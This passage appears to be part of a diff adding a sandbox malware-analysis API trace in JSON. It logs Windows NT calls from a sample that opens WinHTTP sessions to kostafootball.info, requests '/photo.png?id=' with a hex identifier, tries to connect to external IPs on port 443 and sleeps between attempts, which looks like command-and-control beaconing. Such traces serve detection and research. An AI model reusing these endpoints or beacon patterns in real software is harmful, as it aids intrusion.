"0x00000000" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 726 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b85fa", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 727 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b8643", + "parentcaller": "0x756b82a7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x40000003", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00007000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 728 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b869b", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 729 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b86a2", + "parentcaller": "0x756b82a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 730 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77041fb0", + "parentcaller": "0x77028de8", + "category": "registry", + "api": "NtOpenKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" + } + ], + "repeated": 0, + "id": 731 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7702934b", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 732 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x770293dc", + "parentcaller": "0x770297b2", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000450" + }, + { + "name": "DesiredAccess", + "value": "0x00100001", + "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\sysnative\\es-ES\\wshqos.dll.mui" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 733 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x770297fc", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 734 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77029824", + "parentcaller": "0x770292de", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000438" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "SectionOffset", + "value": "0x0546e110" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 735 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x77029834", + "parentcaller": "0x770292de", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 736 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7704a4ca", + "parentcaller": "0x7704a400", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05490000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + } + ], + "repeated": 0, + "id": 737 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7704a4d8", + "parentcaller": "0x7704a400", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000450" + } + ], + "repeated": 0, + "id": 738 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b697c", + "parentcaller": "0x7553904d", + "category": "process", + "api": "NtUnmapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x05480000" + }, + { + "name": "RegionSize", + "value": "0x00007000" + } + ], + "repeated": 0, + "id": 739 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x76112466", + "parentcaller": "0x73a0ba78", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000440" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 740 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000440" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "X\\x00\\x00\\x00h3O\\x00" + } + ], + "repeated": 0, + "id": 741 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x739fee81", + "parentcaller": "0x73a11fa6", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1088" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "34.215.158.160" + }, + { + "name": "port", + "value": "443" + } + ], + "repeated": 0, + "id": 742 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x75535ad9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002c8" + } + ], + "repeated": 0, + "id": 743 + }, + { + "timestamp": "2025-03-07 21:41:19,765", + "thread_id": "1720", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000404" + } + ], + "repeated": 0, + "id": 744 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpSendRequest", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x005012f8" + }, + { + "name": "Headers", + "value": "" + }, + { + "name": "Optional", + "value": "" + } + ], + "repeated": 0, + "id": 745 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "9452", + "caller": "0x024312b1", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtDelayExecution", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Milliseconds", + "value": "5000" + } + ], + "repeated": 0, + "id": 746 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72db591d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000364" + } + ], + "repeated": 0, + "id": 747 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72db5932", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003c8" + } + ], + "repeated": 0, + "id": 748 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x73a0844e", + "parentcaller": "0x73a082c1", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1088" + } + ], + "repeated": 0, + "id": 749 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72da2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000328" + } + ], + "repeated": 0, + "id": 750 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72da2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003d0" + } + ], + "repeated": 0, + "id": 751 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72dd8afe", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000033c" + } + ], + "repeated": 0, + "id": 752 + }, + { + "timestamp": "2025-03-07 21:41:23,203", + "thread_id": "1720", + "caller": "0x756d6dcb", + "parentcaller": "0x756d6d6f", + "category": "system", + "api": "NtDelayExecution", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Milliseconds", + "value": "30000" + } + ], + "repeated": 0, + "id": 753 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 754 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" + }, + { + "name": "DllBase", + "value": "0x74300000" + } + ], + "repeated": 0, + "id": 755 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" + }, + { + "name": "BaseAddress", + "value": "0x74300000" + } + ], + "repeated": 0, + "id": 756 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "unload" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" + }, + { + "name": "DllBase", + "value": "0x74300000" + } + ], + "repeated": 0, + "id": 757 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 758 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpOpen", + "status": true, + "return": "0x004f9180", + "arguments": [ + { + "name": "UserAgent", + "value": "" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 759 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x02431696", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpConnect", + "status": true, + "return": "0x00533278", + "arguments": [ + { + "name": "SessionHandle", + "value": "0x004f9180" + }, + { + "name": "ServerName", + "value": "kostafootball.info" + }, + { + "name": "ServerPort", + "value": "443" + } + ], + "repeated": 0, + "id": 760 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x024316d0", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpOpenRequest", + "status": true, + "return": "0x00500cc0", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00533278" + }, + { + "name": "Verb", + "value": "GET" + }, + { + "name": "ObjectName", + "value": "/photo.png?id=0108B4F53D30923DC90000000000FF40000005" + }, + { + "name": "Version", + "value": "" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Flags", + "value": "0x00800000" + } + ], + "repeated": 0, + "id": 761 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9452", + "caller": "0x024316f7", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00500cc0" + }, + { + "name": "Option", + "value": "0x0000001f" + }, + { + "name": "Buffer", + "value": "\\x003\\x00\\x00" + } + ], + "repeated": 0, + "id": 762 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "440", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 763 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "440", + "caller": "0x7512104c", + "parentcaller": "0x7511e3b8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 764 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x756b8c89", + "parentcaller": "0x72d9cb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 765 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000364" + } + ], + "repeated": 0, + "id": 766 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000454" + } + ], + "repeated": 0, + "id": 767 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x72de5097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000044c" + } + ], + "repeated": 0, + "id": 768 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x72da2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 769 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x72de50ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + } + ], + "repeated": 0, + "id": 770 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003c8" + } + ], + "repeated": 0, + "id": 771 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x73a000dc", + "parentcaller": "0x739ffb17", + "category": "network", + "api": "GetAddrInfoExW", + "status": false, + "return": "0x000003e5", + "arguments": [ + { + "name": "Name", + "value": "kostafootball.info" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 772 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x76041941", + "parentcaller": "0x738c7123", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\xf72\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x08\\xf72\\x05#q\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 773 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000448" + } + ], + "repeated": 0, + "id": 774 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "7084", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 775 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "7084", + "caller": "0x739d16b1", + "parentcaller": "0x7554148c", + "category": "filesystem", + "api": "NtCreateFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000003", + "pretty_value": "FILE_READ_ACCESS|FILE_WRITE_ACCESS" + }, + { + "name": "FileName", + "value": "\\Device\\RasAcd" + }, + { + "name": "CreateDisposition", + "value": "3", + "pretty_value": "FILE_OPEN_IF" + }, + { + "name": "ShareAccess", + "value": "3", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" + }, + { + "name": "FileAttributes", + "value": "0x00000080", + "pretty_value": "FILE_ATTRIBUTE_NORMAL" + }, + { + "name": "ExistedBefore", + "value": "no" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 776 + }, + { + "timestamp": "2025-03-07 21:41:28,234", + "thread_id": "7084", + "caller": "0x756c7924", + "parentcaller": "0x7553f81d", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x0000044c" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 777 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "9156", + "caller": "0x7553dc64", + "parentcaller": "0x75544f9e", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000454", + "arguments": [ + { + "name": "af", + "value": "23", + "pretty_value": "AF_INET6" + }, + { + "name": "type", + "value": "2", + "pretty_value": "SOCK_DGRAM" + }, + { + "name": "protocol", + "value": "0" + }, + { + "name": "socket", + "value": "1108" + } + ], + "repeated": 0, + "id": 778 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "9156", + "caller": "0x6db8a714", + "parentcaller": "0x7553dd57", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000103", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000454" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\xb0\\xeaR\\x00\\x0c\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x01\\x00\\x00\\x00\\xb89Q\\x00\\x1c\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 779 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "9156", + "caller": "0x6db8a9c5", + "parentcaller": "0x6db8a75c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000040c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 780 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "9156", + "caller": "0x6db8ac73", + "parentcaller": "0x6db8aa9e", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000454" + } + ], + "repeated": 0, + "id": 781 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x739ff7b6", + "parentcaller": "0x739ffd35", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 782 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x73a0b752", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000364", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "868" + } + ], + "repeated": 0, + "id": 783 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x73a0b827", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "868" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00003007" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 784 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x73a0b878", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "868" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 785 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x73a0b8dc", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "868" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 786 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x76112466", + "parentcaller": "0x73a0ba78", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000364" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 787 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000364" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "X\\x00\\x00\\x00\\x18/O\\x00" + } + ], + "repeated": 0, + "id": 788 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x739fee81", + "parentcaller": "0x73a11fa6", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "868" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "18.141.10.107" + }, + { + "name": "port", + "value": "443" + } + ], + "repeated": 0, + "id": 789 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x75535ad9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003c8" + } + ], + "repeated": 0, + "id": 790 + }, + { + "timestamp": "2025-03-07 21:41:28,343", + "thread_id": "7084", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + } + ], + "repeated": 0, + "id": 791 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x73a12329", + "parentcaller": "0x739fe296", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "868" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00007010" + }, + { + "name": "optval", + "value": "" + } + ], + "repeated": 